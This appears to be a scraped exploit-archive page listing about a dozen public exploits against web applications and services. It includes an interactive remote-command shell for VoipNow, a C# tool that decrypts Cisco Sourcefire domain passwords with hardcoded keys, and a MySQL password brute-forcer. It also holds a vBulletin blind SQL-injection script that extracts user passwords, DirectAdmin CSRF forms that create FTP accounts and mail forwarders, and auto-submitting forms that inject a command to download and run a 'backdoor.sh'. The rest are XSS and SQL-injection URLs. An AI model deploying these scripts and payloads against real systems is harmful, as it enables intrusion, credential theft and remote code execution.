source: https://www.securityfocus.com/bid/57032/info VoipNow Service Provider Edition is prone to a remote arbitrary command-execution vulnerability because it fails to properly validate user-supplied input. An attacker can exploit this issue to execute arbitrary commands within the context of the vulnerable application. Versions of VoipNow Service Provider Edition prior to 2.3 are vulnerable; other versions may also affected. <? # Title: 4psa VoipNow < 2.3 , Remote Command Execution vuln # Software Link: http://www.4psa.com/products-4psavoipnow.html # Author: Faris , aka i-Hmx # Home : sec4ever.com , 1337s.cc # Mail : n0p1337@gmail.com # Tested on: VoipNow dist. /* VoipNow suffer from critical RCE vuln. Vulnerable File : plib/xajax_components.php Snip. if ( isset( $_GET['varname'] ) ) { $func_name = $_GET['varname']; $func_arg = $_POST["fid-".$_GET['varname']]; $func_params = $_GET; if ( function_exists( $func_name ) ) { echo $func_name( $func_arg, $func_params ); } else { echo "<ul><li>Function: ".$func_name." does not exist.</li></ul>"; } } Demo Exploit : Get : plib/xajax_components.php?varname=system Post : fid-system=echo WTF!! so the result is echo system( 'echo WTF!!', array() ); the system var need just the 1st parameter so don't give fu#* about the array :D Peace out */ echo "\n+-------------------------------------------+\n"; echo "| VoipNow 2.5.3 |\n"; echo "| Remote Command Execution Exploit |\n"; echo "| By i-Hmx |\n"; echo "| n0p1337@gmail.com |\n"; echo "+-------------------------------------------+\n"; echo "\n| Enter Target [https://ip] # "; $target=trim(fgets(STDIN)); function faget($url,$post){ $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$url); curl_setopt($curl, CURLOPT_POSTFIELDS,$post); curl_setopt($curl, CURLOPT_COOKIEFILE, '/'); curl_setopt($curl, CURLOPT_COOKIEJAR, '/'); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0); curl_setopt($curl,CURLOPT_TIMEOUT,20); curl_setopt($curl, CURLOPT_HEADER, false); $exec=curl_exec($curl); curl_close($curl); return $exec; } while(1) { echo "\ni-Hmx@".str_replace("https://","",$target)."# "; $cmd=trim(fgets(STDIN)); if($cmd=="exit"){exit();} $f_rez=faget($target."/plib/xajax_components.php?varname=system","fid-system=$cmd"); echo $f_rez; } # NP : Just cleaning my pc from an old old trash , The best is yet to come ;) ?>
HireHackking

TinyMCPUK - 'test' Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56767/info TinyMCPUK is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. TinyMCPUK 0.3 is vulnerable; other versions may also be affected. http://www.example.com/filemanager/connectors/php/connector.php?test=&lt;h1&gt;p0c&lt;/h1&gt;&amp;xss=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
HireHackking

WordPress Theme Nest - 'codigo' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56792/info The Nest theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/wp-content/themes/nest/gerador_galeria.php?codigo=[Sqli]
HireHackking
# Exploit Title: Wordpress White-Label Framework XSS # Google Dork: inurl:/wp-content/themes/whitelabel-framework/inc/form-sharebymail_iframe.php # Date: 7 September 2015 # Exploit Author: Outlasted # Software Link: wordpress.com / http://whitelabelframework.com/ # Version: 2.0.6 #Greetz to: TeaMp0isoN ===================================================== Vulnerable url: /wp-content/themes/whitelabel-framework/inc/form-sharebymail_iframe.php ===================================================== How to exploit? ---------------------------------------------------------------------------------------------------------- Enter your XSS payload in all forms and watch the magic.
HireHackking

Cisco Sourcefire User Agent 2.2 - Insecure File Permissions

HACKER · %s · %s

/* Cisco Sourcefire User Agent Insecure File Permissions Vulnerability Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco SF User Agent 2.2 Fixed version(s): Cisco SF User Agent 2.2-25 Date: 08/09/2015 Credits: Glafkos Charalambous CVE: Not assigned by Cisco BugId: CSCut44881 Disclosure Timeline: 18-03-2015: Vendor Notification 19-03-2015: Vendor Response/Feedback 01-09-2015: Vendor Fix/Patch 08-09-2015: Public Disclosure Description: Sourcefire User Agent monitors Microsoft Active Directory servers and report logins and logoffs authenticated via LDAP. The FireSIGHT System integrates these records with the information it collects via direct network traffic observation by managed devices. Vulnerability: Sourcefire User Agent is vulnerable to default insecure file permissions and hardcoded encryption keys. A local attacker can exploit this by gaining access to user readable database file and extracting sensitive information. In combination with hard-coded 3DES keys an attacker is able to decrypt configured Domain Controller accounts which can lead to further attacks. C:\Users\0x414141>icacls "C:\SourcefireUserAgent.sdf" C:\SourcefireUserAgent.sdf BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) Mandatory Label\High Mandatory Level:(I)(NW) Successfully processed 1 files; Failed processing 0 files */ using System; using System.Text; using System.Security.Cryptography; using System.Data.SqlServerCe; namespace SFDecrypt { class Program { static void Main(string[] args) { SqlCeConnection conn = null; try { string FileName = @"C:\SourcefireUserAgent.sdf"; string ConnectionString = string.Format("DataSource=\"{0}\";Mode = Read Only;Temp Path =C:\\Windows\\Temp", FileName); conn = new SqlCeConnection(ConnectionString); string query = "Select host, domain, username, password FROM active_directory_servers"; SqlCeCommand cmd = new SqlCeCommand(query, conn); conn.Open(); SqlCeDataReader rdr = cmd.ExecuteReader(); while (rdr.Read()) { string strHost = rdr.GetString(0); string strDom = rdr.GetString(1); string strUser = rdr.GetString(2); string strPass = rdr.GetString(3); Console.WriteLine("Host: " + strHost + " Domain: " + strDom + " Username: " + strUser + " Password: " + Decrypt.Decrypt3DES(strPass)); } rdr.Close(); } catch (Exception exception) { Console.Write(exception.ToString()); } finally { conn.Close(); } } } class Decrypt { public static string Decrypt3DES(string strEncrypted) { string strDecrypted = ""; try { TripleDESCryptoServiceProvider provider = new TripleDESCryptoServiceProvider(); provider.Key = Encoding.UTF8.GetBytes("50uR<3F1r3R0xDaH0u5eW0o+"); provider.IV = Encoding.UTF8.GetBytes("53cUri+y"); byte[] inputBuffer = Convert.FromBase64String(strEncrypted); byte[] bytes = provider.CreateDecryptor().TransformFinalBlock(inputBuffer, 0, inputBuffer.Length); strDecrypted = Encoding.Unicode.GetString(bytes); } catch (Exception exception) { Console.Write("Error Decrypting Data: " + exception.Message); } return strDecrypted; } } } References: https://tools.cisco.com/bugsearch/bug/CSCut44881
HireHackking

Oracle MySQL / MariaDB - Insecure Salt Generation Security Bypass

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56837/info MySQL and MariaDB are prone to a security-bypass weakness. An attacker may be able to exploit this issue to aid in brute-force attacks; other attacks may also be possible. use Net::MySQL; $|=1; my $mysql = Net::MySQL->new( hostname => '192.168.2.3', database => 'test', user => "user", password => "secret", debug => 0, ); $crackuser = "crackme"; while(<stdin>) { chomp; $currentpass = $_; $vv = join "\0", $crackuser, "\x14". Net::MySQL::Password->scramble( $currentpass, $mysql->{salt}, $mysql->{client_capabilities} ) . "\0"; if ($mysql->_execute_command("\x11", $vv) ne undef) { print "[*] Cracked! --> $currentpass\n"; exit; } } --- example session: C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo hn --incremental --stdout=5 | perl mysqlcrack.pl Warning: MaxLen = 8 is too large for the current hash type, reduced to 5 words: 16382 time: 0:00:00:02 w/s: 6262 current: citcH words: 24573 time: 0:00:00:04 w/s: 4916 current: rap words: 40956 time: 0:00:00:07 w/s: 5498 current: matc3 words: 49147 time: 0:00:00:09 w/s: 5030 current: 4429 words: 65530 time: 0:00:00:12 w/s: 5354 current: ch141 words: 73721 time: 0:00:00:14 w/s: 5021 current: v3n words: 90104 time: 0:00:00:17 w/s: 5277 current: pun2 [*] Cracked! --> pass words: 98295 time: 0:00:00:18 w/s: 5434 current: 43gs Session aborted
HireHackking

DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities

HACKER · %s · %s

============================================================================= [+] Exploit Title : DirectAdmin Web Control Panel CSRF/XSS vulnerability [+] Exploit Author : Ashiyane Digital Security Team [+] Date : 1.483 [+] Version : 2015/09/08 [+] Tested on : Elementary Os [+] Vendor Homepage : http://www.directadmin.com/ ============================================================================= [+] Introduction : DirectAdmin is a graphical web-based web hosting control panel designed to make administration of websites easier. DirectAdmin suffers from cross site request forgery and cross site scripting vulnerabilities ============================================================================= [+] CMD_FILE_MANAGER : [+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site [+] Exploit 1: Create New File and Edit a file <form name=info action='http://address:port/CMD_FILE_MANAGER' method='POST'> <input type="hidden" name="action" value="edit"> <input type="hidden" name="path" value="/domains/address/public_html"> <input type="hidden" name="text" value="<?php //codes ?>"> <input type="hidden" name="filename" value="index.php"> <input type="submit" onClick="save=0;" value="Save As"> ----------------------------------------------------------------------------- [+] Exploit 2: Create a New Folder <form name=folderform action="/CMD_FILE_MANAGER" method="POST"> <input type="hidden name=action value="folder"> <input type="hidden name="path" value="/domains/iceschool.ir/public_html"> <input type="hidden" name="name" value="Folder"> <input type=submit value="Create"> </form> ----------------------------------------------------------------------------- [+] Exploit 3: Rename a file <form name=info action='http://address:port/CMD_FILE_MANAGER' method='POST'> <input type=hidden name=action value="rename"> <input type="hidden" name="path" value="/domains/address/public_html"> <input type="hidden" name="old" value="Oldname"> <input type="hidden" name="filename" value="Newname"> <input type="hidden" name="overwrite" value="yes"> <input type="submit" value="Rename"> </form> ----------------------------------------------------------------------------- [+] Exploit 4 : Reflected XSS <form name='info' action='http://address:port/CMD_FILE_MANAGER' method='POST'> <input type="hidden" name="action" value="edit"> <input type="hidden" name="path" value='/xss/"><script>alert(/XSS Vuln/)</script>'> <input type="hidden" name="text" value="xss"> <input type="hidden" name="filename" value="xss"> <input type="submit" onClick="save=0;" value="Save As"> </form> ============================================================================= [+] CMD_FTP : [+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site [+] Exploit : Create FTP account <form name="reseller" action="http://address:port/CMD_FTP" method="post"> <input style="display:none" type="text" name="fakeusernameremembered"/> <input style="display:none" type="password" name="fakepasswordremembered"/> <input type="hidden" name="action" value="create"> <input type="hidden" name="domain" value="domain.xyz"> <!-- Example : ashiyane.org --> <input type="hidden" name="user" value="ehsan"> <input type="hidden" name="passwd" value="pass1234"> <input type="hidden" name="passwd2" value="pass1234"> <input type="hidden" name="type" value="domain" checked> <input type="hidden" name="type" value="ftp"> <input type="hidden" name="type" value="user"> <input type="hidden" name="type" value="custom"> <input type="hidden" name="custom_val" value="/home/domain"> <!-- Example : /home/ashiyane --> <input type="submit" name="create" value="Create"> </form> ============================================================================= [+] CMD_DB : [+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site [+] Exploit : Create new Database <form name=reseller action="http://address:port/CMD_DB" method="post"> <input type="hidden" name=action value=create> <input type="hidden" name=domain value="domain.xyz"> <!-- Domain --> <input type="hidden" name="name" value="dbname"> <!-- Database Name --> <input type="hidden" name="user" value="ehsan"> <!-- Username --> <input type="hidden" name="passwd" value="pass1234"> <!-- Password --> <input type="hidden" name="passwd2" value="pass1234"> <!-- Password --> <input type="submit" name="create" value="Create"> </form> ============================================================================= [+] CMD_DB : [+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site [+] Exploit : Create new E-Mail Forwarder <form name=info action="CMD_EMAIL_FORWARDER" method="post"> <input type=hidden name=action value=create> <input type=hidden name=domain value="domain.xyz"><!-- Domain --> <input type="hidden" name="user" value="info"> <!-- Forwarder Name --> <input type="hidden" name="email" value="hehsan979@gmail.com"> <!-- Destination Email --> <input type="submit" name="create" value="Create"> </form> ============================================================================= [+] Discovered By : Ehsan Hosseini (hehsan979@gmail.com)
HireHackking

vBulletin ajaxReg Module - SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56877/info The ajaxReg module for vBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. #!/usr/bin/php <? # vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit # https://www.example.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png # livedemo : http://www.example.com/watch?v=LlKaYyJxH7E # check it : http://www.example.com/vBulletin/clientscript/register.js function usage () { echo "\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit". "\n[+] Author: Cold z3ro". "\n[+] Site : http://www.example.com | www.example.com". "\n[+] vandor: http://www.example.com/forum/showthread.php?t=144869". "\n[+] Usage : php 0day.php <hostname> <path> [userid] [key]". "\n[+] Ex. : php 0day.php www.example.com /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz". "\n[+] Note. : Its a 0day exploit\n\n"; exit (); } function check ($hostname, $path, $field, $pos, $usid, $char) { $char = ord ($char); $inj = 'ajax.php?do=CheckUsername&param='; $inj.= "admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*"; $culr = $hostname.$path.$inj; $curl = curl_init(); curl_setopt ($curl, CURLOPT_URL, $culr ); curl_setopt($curl, CURLOPT_HEADER, 1); curl_setopt($curl, CURLOPT_VERBOSE, 0); ob_start(); curl_exec ($curl); curl_close ($curl); $con = ob_get_contents(); ob_end_clean(); if(eregi('Invalid',$con)) return true; else return false; } function brutechar ($hostname, $path, $field, $usid, $key) { $pos = 1; $chr = 0; while ($chr < strlen ($key)) { if (check ($hostname, $path, $field, $pos, $usid, $key [$chr])) { echo $key [$chr]; $chr = -1; $pos++; } $chr++; } } if (count ($argv) != 4) usage (); $hostname = $argv [1]; $path = $argv [2]; $usid = $argv [3]; $key = $argv [4]; if (empty ($key)) $key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; echo "[+] Username: "; brutechar ($hostname, $path, "username", $usid, $key); echo "\n[+] Password: "; brutechar ($hostname, $path, "password", $usid, $key); echo "\n[+] Done.."; echo "\n[+] It's not fake, its real."; # word to 1337day.com, stop scaming me ?>
HireHackking
source: https://www.securityfocus.com/bid/56881/info Smartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities. Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer. Smartphone Pentest Framework 0.1.3 and 0.1.4 are vulnerable; other versions may also be affected. 1. <form action="http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl" method="post" name=f1> <input type="hidden" name="platformDD2" value='android' /> <input type="hidden" name="hostingPath" value='a & wget http://www.example.com/backdoor.sh && chmod a+x ./backdoor.ch && ./backdoor.sh & ' /> <input type="submit" id="btn"> </form> <script> document.f1.Submit() </script> 2. <form action="http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl" method="post" name=f1> <input type="hidden" name="hostingPath" value='a & wget http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> <input type="submit" id="btn"> </form> <script> document.f1.Submit() </script> 3. <form action="http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl" method="post" name=f1> <input type="hidden" name="appURLPath" value='a & wget http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> <input type="submit" id="btn"> </form> <script> document.f1.Submit() </script> 4. <form action="http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl" method="post" name=f1> <input type="hidden" name="ipAddressTB" value='a & wget http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> <input type="submit" id="btn"> </form> <script> document.f1.Submit() </script>
HireHackking
source: https://www.securityfocus.com/bid/56882/info Simple Invoices is prone to multiple HTML-injection vulnerabilities and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. [http://]www.example.com/simpleinvoices/index.php?module=invoices&view=manage&having=%3C/script%3E%3Cscript%3Ealert%28%27POC%20XSS%27%29;%3C/script%3E%3Cscript%3E
HireHackking

MyBB Transactions Plugin - 'transaction' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/57009/info The Transactions Plugin for MyBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Transactions 2.0 is vulnerable; other versions may also be affected. http://www.example.com//bank.php?transactions=[SQLi]